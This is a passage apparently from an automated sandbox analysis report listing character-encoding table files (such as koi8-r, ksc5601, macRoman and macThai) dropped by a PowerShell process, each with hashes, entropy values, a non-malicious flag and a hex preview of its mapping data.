                                                                                                                                                                                                                              Entropy (8bit):2.3455261548208055
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:9F/D7CH2puD5CdzU3nAkP5dHn7s391fmOarFaVQ:H/D7CHbozU3nAk3H7sXm3FgQ
                                                                                                                                                                                                                              MD5:07CE2C135BE17DBAFA558AA5949A53DB
                                                                                                                                                                                                                              SHA1:5D9DBEFCCB44E76C1A4E61360C6FCED8DCC8EF4D
                                                                                                                                                                                                                              SHA-256:785CFC5F5D9CB06DB8061730AB0016A0F70D0B59F6787D2A3CBB8D5779C99706
                                                                                                                                                                                                                              SHA-512:E954D7198D58ACEDEB4C8E5F466107767C3DA43763A5F6CDDFCF567226F9B22B4C2DE27564F28CD125D7F1BA7CB9C6DE6DEC4065EC2676572C793BE458FDDD9D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: jis0212, double-byte..D..2244 0 68..22..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00000000000000000000000000000000000000000000000000000000000002D8..02C700B802D902DD00AF02DB02DA007E03840385000000000000000000000000..0000000000A100A600BF00000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000BA00AA00A900AE2122..00A4211600000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.531149521168141
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:KcJ5mHVBUlJvRj7SOVbusZhAMiZyi77qpSzIa9qVRS3YcEchJh3MAxSl:KmmMlBVnrAMiwMmAzIxVgBE6cAxQ
                                                                                                                                                                                                                              MD5:96F54CC639ACA8E466FB8058144C9350
                                                                                                                                                                                                                              SHA1:0B9530D6080F2BAACABD5AA0D48BFF316FCCEF64
                                                                                                                                                                                                                              SHA-256:0E43244BFC4F33FACB844B9E00270A1A4C24DC59B8A9B95104E2D788BB2F59FD
                                                                                                                                                                                                                              SHA-512:5B7859325E5E34C9D4558B1198795BB9C6A8EF783EB97193EA80BA76C38AFE9BDD1B526B77401DF5456B7A0E85E942191FFD4B4F2B9F0C8168A7093EE452802E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-r, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204512553255425552556255725582559255A255B255C255D255E..255F25602561040125622563256425652566256725682569256A256B256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1111
                                                                                                                                                                                                                              Entropy (8bit):3.5076564572101714
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:K+HVBUlJvRj7SOVbusZhAMiZyi77qpSzIaU3dmVRS3YcEchJh3MAxSl:K+MlBVnrAMiwMmAzI/EVgBE6cAxQ
                                                                                                                                                                                                                              MD5:4B755EF2288DFC4009759F8935479D68
                                                                                                                                                                                                                              SHA1:C3BDF0D9DF316DE8919DAA4329275C5AA81D61B4
                                                                                                                                                                                                                              SHA-256:ED04D5B977B8C8944D8760B713FF061292DA5634BCBB67CDFB1C3A6FF5378C81
                                                                                                                                                                                                                              SHA-512:3F1E1CC47327054FB9C54157ED10514230F10BFCD4BD9FDAFA02D7B238137DC7442CA2661B0739D8EEA3181E187D3B639A2C8118A0DE272C96000908121B6CFB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: koi8-u, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..25002502250C251025142518251C2524252C2534253C258025842588258C2590..259125922593232025A02219221A22482264226500A0232100B000B200B700F7..25502551255204510454255404560457255725582559255A255B0491255D255E..255F25602561040104032563040604072566256725682569256A0490256C00A9..044E0430043104460434043504440433044504380439043A043B043C043D043E..043F044F044004410442044304360432044C044B04370448044D04490447044A..042E04100411042604140
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):94393
                                                                                                                                                                                                                              Entropy (8bit):2.4104200953565513
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:XbjO7Uw6uKdosXRxps9a+ut/BmZPwkpT9A0T03o:XfO4ZBRxpV+4wPwKloo
                                                                                                                                                                                                                              MD5:366C09E4A4CC10006E593F5B3F3461D7
                                                                                                                                                                                                                              SHA1:A0DABFBEEB66E26FB342844EA41772D7A1D19C24
                                                                                                                                                                                                                              SHA-256:9B27FE7E7054F36E279993F19E52E18AC03360D117AE80C42B4E984A97C590AA
                                                                                                                                                                                                                              SHA-512:670F32D698C7992038E736D3AD40098D8589C0C5A1379E32A0F02A02FAF251B1312CAD131DDADC3F80B23A3821A91689F2E310309028BDDDF227D532EB505A20
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: ksc5601, double-byte..D..233F 0 89..21..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..000030003001300200B72025202600A8300300AD20152225FF3C223C20182019..201C201D3014301530083009300A300B300C300D300E300F3010301100B100D7..00F7226022642265221E223400B0203220332103212BFFE0FFE1FFE526422640..222022A52312220222072261225200A7203B2606260525CB25CF25CE25C725C6..25A125A025B325B225BD25BC219221902191219321943013226A226B221A223D..221D2235222B222C2208220B2286228722822283222A222922272228FFE20000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4295694929963667
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8jHVBUlJvRj7SOVbusZhAMiZyi77qHVPJSf2FcVDu1LEe4qPPMl2J89:8jMlBVnrAMiwMmHEmJ4IMgi9
                                                                                                                                                                                                                              MD5:10850BCFB943318284D6191494EBD7D5
                                                                                                                                                                                                                              SHA1:237D5DDF7969A422991F17021244D13A2BB0DE92
                                                                                                                                                                                                                              SHA-256:81ECA6840B87F2DEF9FCDD171A55C2D71A49386D88401CE927AE57D7DDD7AAAA
                                                                                                                                                                                                                              SHA-512:D797781C228B70D2D83DB8ABA08F840CE49846C9473CC89A2E316900D9E08A63142E68AD9ABBB2EF67BF9F1D392772FAB36CCC09632022A1437AE27C11F2284F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macCentEuro, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C40100010100C9010400D600DC00E10105010C00E4010D0106010700E90179..017A010E00ED010F01120113011600F3011700F400F600F500FA011A011B00FC..202000B0011800A300A7202200B600DF00AE00A92122011900A822600123012E..012F012A22642265012B0136220222110142013B013C013D013E0139013A0145..0146014300AC221A01440147220600AB00BB202600A00148015000D50151014C..20132014201C201D2018201900F725CA014D0154015501582039203A01590156..01570160201A201E
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.3992482002374516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8ULyHVBUlJvRj7SOVbusZhAMiZyi77qsTMdKxOZwwL+KR5D/jlJy6QWky:8ULyMlBVnrAMiwMmOsL+KR5DblE85
                                                                                                                                                                                                                              MD5:A60FBDE33D13C732095713D1AB6713AB
                                                                                                                                                                                                                              SHA1:4B0EB443F2D0E4B8DB7D0435F9311E5F9A625123
                                                                                                                                                                                                                              SHA-256:BBE6F5EBB5EAB08C91DF7D524FAF39B03AA8B9F84C67ABA0553A84EC56668CB9
                                                                                                                                                                                                                              SHA-512:3EEBA6BA3FCD875AFBD5DF41EDC21E872416A48D03343232904CC99CAF913045DAF7B1A1ACD0949EF794AD7B6C9AE8F93808423FFC4B67718E732B2FF5D9B6D7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macCroatian, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE0160212200B400A82260017D00D8..221E00B122642265220600B522022211220F0161222B00AA00BA03A9017E00F8..00BF00A100AC221A01922248010600AB010C202600A000C000C300D501520153..01102014201C201D2018201900F725CAF8FF00A9204420AC2039203A00C600BB..201300B7201A201E
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.4178221849964903
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dHVBUlJvRj7SOVbusZhAMiZyi77qb+SAJlz9a4piS1yk+5yye3cJY:8dMlBVnrAMiwMm8Y6zUk+UVsJY
                                                                                                                                                                                                                              MD5:C390D66441AC61CCF0A685CA5EE0BC1C
                                                                                                                                                                                                                              SHA1:FCAE825B54400B9D736EF22A613E359E3F0FA6C2
                                                                                                                                                                                                                              SHA-256:76EFE571ADDA7AED467F146CB0BD3A2351F2A720508EA0642C419F5347789CAA
                                                                                                                                                                                                                              SHA-512:C891DB15E0F600965885DE6745EDD2A4E3A6A20CA30A9AAE89CBD8C429F8455C4AF7F2FC053FB3D730D8544AB6A6E78E769DB93DAD7B29868B746FA10373F021
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macCyrillic, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0410041104120413041404150416041704180419041A041B041C041D041E041F..0420042104220423042404250426042704280429042A042B042C042D042E042F..202000B0049000A300A7202200B6040600AE00A9212204020452226004030453..221E00B122642265045600B504910408040404540407045704090459040A045A..0458040500AC221A01922248220600AB00BB202600A0040B045B040C045C0455..20132014201C201D2018201900F7201E040E045E040F045F211604010451044F..0430043104320433
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1116
                                                                                                                                                                                                                              Entropy (8bit):3.870022681111701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:87JMHkUlJvRjmf9RCsUBOdXsCbbNviANpkDP1XFAoE4xSF5HrBPkdn:87KvlA9RCs6CXrViANUP1XFA9eSvdPKn
                                                                                                                                                                                                                              MD5:DCE78527E3A7B7CB1DE9EE5FAF12AFC6
                                                                                                                                                                                                                              SHA1:20F4A3F4DB6B3422C04EBB6B21A568E4C173F9C1
                                                                                                                                                                                                                              SHA-256:062E31D48DC33160999074E49205E08C3655DFF91C2C87F254522E6EBCE2DD96
                                                                                                                                                                                                                              SHA-512:627F5FD2F12B341F2D7EE9032946FE057C4AC74D99687178CEA98B3E150307BB6AA2495B0FA46400760D467E2BF589BE31E998E25CE1D1E8465DA61F22047345
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macDingbats, single-byte..S..003F 1 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..00202701270227032704260E2706270727082709261B261E270C270D270E270F..2710271127122713271427152716271727182719271A271B271C271D271E271F..2720272127222723272427252726272726052729272A272B272C272D272E272F..2730273127322733273427352736273727382739273A273B273C273D273E273F..2740274127422743274427452746274727482749274A274B25CF274D25A0274F..27502751275225B225BC25C6275625D727582759275A275B275C275D275E007F..F8D7F8D8F8D9F8DAF8DBF8DCF8DDF8DEF8DFF8E0F8E1F8E2F8E3F8E4008E008F..0090009100920093009400950096009700980099009A009B009C009D009E009F..0000276127622763276427652766276726632666266526602460246124622463..2464246524662467246824692776277727782779277A277B277C277D277E277F..2780278127822783278427852786278727882789278A278B278C278D278E278F..2790279127922793279421922194219527982799279A279B279C279D279E279F..27A027A127A227A3
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4954458011071323
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8dOHVBUlJvRj7SOVbusZhAMiZyi77qJlbaBMD2aSY5us36Ekp1ysOSU2imR:8kMlBVnrAMiwMm7aKPVusqx1ysOJjmR
                                                                                                                                                                                                                              MD5:0CC92F685A4132BE4B030006670D81CE
                                                                                                                                                                                                                              SHA1:13B1074A90055E9EA061A6206A9C004DA29967A9
                                                                                                                                                                                                                              SHA-256:1AABE561B5C944ABD11C293D4ACAC0F3A4A5A9E84A0342D066F4E3E992348895
                                                                                                                                                                                                                              SHA-512:E1AF3D47D681CD68B6063DEC1241631CABE86FE835232FA73D855AC74D0175540D46511282BE7198A67A37970A5D05CDECF55C10424ED9C1413C108F116094D9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macGreek, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400B900B200C900B300D600DC038500E000E200E4038400A800E700E900E8..00EA00EB00A3212200EE00EF202200BD203000F400F600A600AD00F900FB00FC..2020039303940398039B039E03A000DF00AE00A903A303AA00A7226000B000B7..039100B12264226500A503920395039603970399039A039C03A603AB03A803A9..03AC039D00AC039F03A1224803A400AB00BB202600A003A503A7038603880153..20132015201C201D2018201900F70389038A038C038E03AD03AE03AF03CC038F..03CD03B103B203C803B
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.3991839018654573
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8KHVBUlJvRj7SOVbusZhAMiZyi77qscqMVmOZmk/LYRldjY/g4JyMWG:8KMlBVnrAMiwMmzqi/LYRlYBEXG
                                                                                                                                                                                                                              MD5:747ADBE54D6992467415E322326FA1B9
                                                                                                                                                                                                                              SHA1:5E3967B5DDF3A6DBF07E90ED6B9B9C2F3F3F35FE
                                                                                                                                                                                                                              SHA-256:6FD08CE6FBA521D51E8058DE5C2DBD6583B80306A8BE7D015361F76314E70A35
                                                                                                                                                                                                                              SHA-512:A04B946993985BF1F8FBA3A7A9AD3838F43F8F27F69B1FB1015D9DC8612AAFCE24E30CBC1FCABBDFB359FD487D51F70F18DA0CDA4A87749A2C82309CEB054849
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macIceland, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..00DD00B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC00D000F000DE00FE..00FD00B7201A201E2
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):48813
                                                                                                                                                                                                                              Entropy (8bit):3.3767502114972077
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:K/RPrUHiJrKWkyY/W2wHiwWnwWOORY+gutSJi:KVUidzJCurDGSk
                                                                                                                                                                                                                              MD5:3DCD22325E0194AAD4959C939B1DE24D
                                                                                                                                                                                                                              SHA1:ABEF1372FBDA83714CE29E015D9A198D4B37B21C
                                                                                                                                                                                                                              SHA-256:47007D9EBF4D34C6CE3599E50AFC7C1CF8129B88994DE2C2A857C09003F9CD2B
                                                                                                                                                                                                                              SHA-512:B8ADFD2315EA38E5F7D4DED219759380069AAB539F1B5AAA5626CE32428CBBEB5E8215AD8351E023BCF72FA4DC30AB40CF59D6D45E33B6D1A6B41BEBFD4BD4C2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macJapan, multi-byte..M..003F 0 46..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..0080000000000000000000000000000000000000000000000000000000000000..0000000000000000000000000000000000000000000000000000000000000000..00A0FF61FF62FF63FF64FF65FF66FF67FF68FF69FF6AFF6BFF6CFF6DFF6EFF6F..FF70FF71FF72FF73FF74FF75FF76FF77FF78FF79FF7AFF7BFF7CFF7DFF7EFF7F..FF80FF81FF82FF83FF84FF85FF86FF87FF88FF89FF8AFF8BFF8CFF8DFF8EFF8F..FF90FF91FF92FF93FF94FF95FF96FF97FF98FF99FF9AFF9BFF9CFF9DFF9EFF9F..0000000000000000000
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1113
                                                                                                                                                                                                                              Entropy (8bit):3.4060725247347516
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8THVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldjBpmg4JyMWG:8TMlBVnrAMiwMmOi/LYRlTsBEXG
                                                                                                                                                                                                                              MD5:34691FADC788B85D98F63159640C7DD0
                                                                                                                                                                                                                              SHA1:C8B3D084D3E831EFF6ECEF71B2029545F214C3D4
                                                                                                                                                                                                                              SHA-256:C83D971D6BC0284EF323C197896E38C57A5FF44784E451EC2997EDA70C0DD85C
                                                                                                                                                                                                                              SHA-512:77D5676F9B7AF7FD1D612A1C426889D8F2C0191887E180B78C4AA42202928A1B3078B76BD3C5F5ABB2A5CE1AE913E3CA6EFDE0483D2A2B0EFC173EF25EAE1D67
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macRoman, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A8226000C600D8..221E00B12264226500A500B522022211220F03C0222B00AA00BA03A900E600F8..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204420AC2039203AFB01FB02..202100B7201A201E203
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.412326247178521
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8tHVBUlJvRj7SOVbusZhAMiZyi77qsTMVZ5OZwYRldj/T9g4JyMWG:8tMlBVnrAMiwMmOA7YRlFT9BEXG
                                                                                                                                                                                                                              MD5:04E25073BFB0019D8381B72F7B433F00
                                                                                                                                                                                                                              SHA1:B63B0AD9F10A44B0DDD12A3BDBCDEB2992D6D385
                                                                                                                                                                                                                              SHA-256:0B805DAF21D37D702617A8C72C7345F857695108D905FF378791F291CEA150F0
                                                                                                                                                                                                                              SHA-512:0514EC054676C15C65B01B02747CDBAD79BC89FD1A24A17797A8729752FB748FEDBE920E7BBFF41A6DA4BA99002E3B8DB674D53E30485DC36F6BF737EAF11702
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macRomania, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00C400C500C700C900D100D600DC00E100E000E200E400E300E500E700E900E8..00EA00EB00ED00EC00EE00EF00F100F300F200F400F600F500FA00F900FB00FC..202000B000A200A300A7202200B600DF00AE00A9212200B400A822600102015E..221E00B12264226500A500B522022211220F03C0222B00AA00BA21260103015F..00BF00A100AC221A01922248220600AB00BB202600A000C000C300D501520153..20132014201C201D2018201900F725CA00FF0178204400A42039203A01620163..202100B7201A201E2
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1112
                                                                                                                                                                                                                              Entropy (8bit):3.6062142626989004
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:88HVBUlJvRj7SOVbusZhAMiZyi77qqJipJwHmEU4AyqU+TpH:88MlBVnrAMiwMmqJ8Jf4AyqUe
                                                                                                                                                                                                                              MD5:06DC6BA6E4A75CD7FF2D7A4248912C61
                                                                                                                                                                                                                              SHA1:23FB16763A8F11EF48E805E4F453C2F812D48FC4
                                                                                                                                                                                                                              SHA-256:A1802A2FEB01B255EC7C17425EEE4525372DF8CE226F4047D149172EB438F913
                                                                                                                                                                                                                              SHA-512:41A487EC5C36C17B2746C5DC770882A836E6E75CF6A14C31595EB211022F0476BD3B953497C447F21554769F127C3A56E5B6EF8FB3C20A8AFF8C67E0CC94359D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# Encoding file: macThai, single-byte..S..003F 0 1..00..0000000100020003000400050006000700080009000A000B000C000D000E000F..0010001100120013001400150016001700180019001A001B001C001D001E001F..0020002100220023002400250026002700280029002A002B002C002D002E002F..0030003100320033003400350036003700380039003A003B003C003D003E003F..0040004100420043004400450046004700480049004A004B004C004D004E004F..0050005100520053005400550056005700580059005A005B005C005D005E005F..0060006100620063006400650066006700680069006A006B006C006D006E006F..0070007100720073007400750076007700780079007A007B007C007D007E007F..00AB00BB2026F88CF88FF892F895F898F88BF88EF891F894F897201C201DF899..FFFD2022F884F889F885F886F887F888F88AF88DF890F893F89620182019FFFD..00A00E010E020E030E040E050E060E070E080E090E0A0E0B0E0C0E0D0E0E0E0F..0E100E110E120E130E140E150E160E170E180E190E1A0E1B0E1C0E1D0E1E0E1F..0E200E210E220E230E240E250E260E270E280E290E2A0E2B0E2C0E2D0E2E0E2F..0E300E310E320E330E340E350E360E370E380E390E3AFEFF200B201320140E3F..0E400E410E420E430E44
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1115
                                                                                                                                                                                                                              Entropy (8bit):3.422718883614008
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:8QjHVBUlJvRj7SOVbusZhAMiZyi77qsTMVmOZmk/LYRldD8g4JyS:88MlBVnrAMiwMmOi/LYRlWBES
                                                                                                                                                                                                                              MD5:4EA94A0DB35BED2081A2CC9D627A8180
                                                                                                                                                                                                                              SHA1:AB2AC3ADA19F3F656780FF876D5B536A8DCE92C6
                                                                                                                                                                                                                              SHA-256:AFB66138EBE9B87D8B070FE3B6E7D1A05ED508571E9E5B166C3314069D59B4E4
                                                                                                                                                                                                                              SHA-512:7888F560D3728732BE1B7DCE49ECB61F3399CEF11191F4116C891E1D147B2A90ED8FB4A5E7B51904A001C47750BD9EB1B15EA5BA5B4EC5D69CDE7704B69529AD
                                                                                                                                                                                                                              Malicious:false
